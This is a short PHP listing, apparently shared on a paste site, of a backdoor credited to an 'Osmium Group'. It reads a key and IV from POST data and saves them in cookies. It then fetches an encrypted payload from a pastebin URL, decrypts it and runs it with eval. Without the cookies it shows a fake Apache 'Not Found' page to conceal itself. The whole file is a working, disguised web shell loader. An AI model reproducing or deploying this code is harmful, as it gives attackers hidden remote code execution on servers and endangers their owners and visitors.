· 9 years ago · Oct 22, 2016, 09:26 PM
1<?php
2/*
3
4_______ _ _ _______ ______ _ _ _______ _____ _ _ _____ _______ _ _ _______
5|______ | | | | |_____/ | | | | | |_____] |_____| |_____] |______ |_____| |______ | |
6| |_____| |_____ |_____ | \_ |_____| | | | | | | | ______| | | |______ |_____ |_____
7
8 By Anthrax and Drigg3r
9 Osmium Group
10
11*/
12function encrypt_decrypt($action, $string, $secret_key, $secret_iv) {
13 $output = false;
14
15 $encrypt_method = "AES-256-CBC";
16
17 $key = hash('sha256', $secret_key);
18
19 $iv = substr(hash('sha256', $secret_iv), 0, 16);
20
21 if( $action == 'encrypt' ) {
22 $output = openssl_encrypt($string, $encrypt_method, $key, 0, $iv);
23 $output = base64_encode($output);
24 }
25 else if( $action == 'decrypt' ){
26 $output = openssl_decrypt(base64_decode($string), $encrypt_method, $key, 0, $iv);
27 }
28
29 return $output;
30}
31
32$key = $_POST["key"];
33
34$iv = $_POST["iv"];
35
36if ( isset( $_POST[ 'key' ] ) && isset( $_POST[ 'iv' ] ) ) {
37setcookie('iv', $iv, time() + (600), "/");
38setcookie('key', $key, time() + (600), "/");
39}
40if( isset( $_COOKIE['iv']) && isset( $_COOKIE['key'])) {
41$encrypt_txt = file_get_contents("http://pastebin.com/raw/x8irpiah");
42$decrypted_txt = encrypt_decrypt('decrypt', $encrypt_txt, $_COOKIE['key'], $_COOKIE['iv']);
43eval("?>".($decrypted_txt));
44} else
45 printf(
46 "<h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr /><p>".
47 "Apache Server at %s Port %s</p>", $_SERVER['SERVER_NAME'], $_SERVER['SERVER_PORT'] );
48?>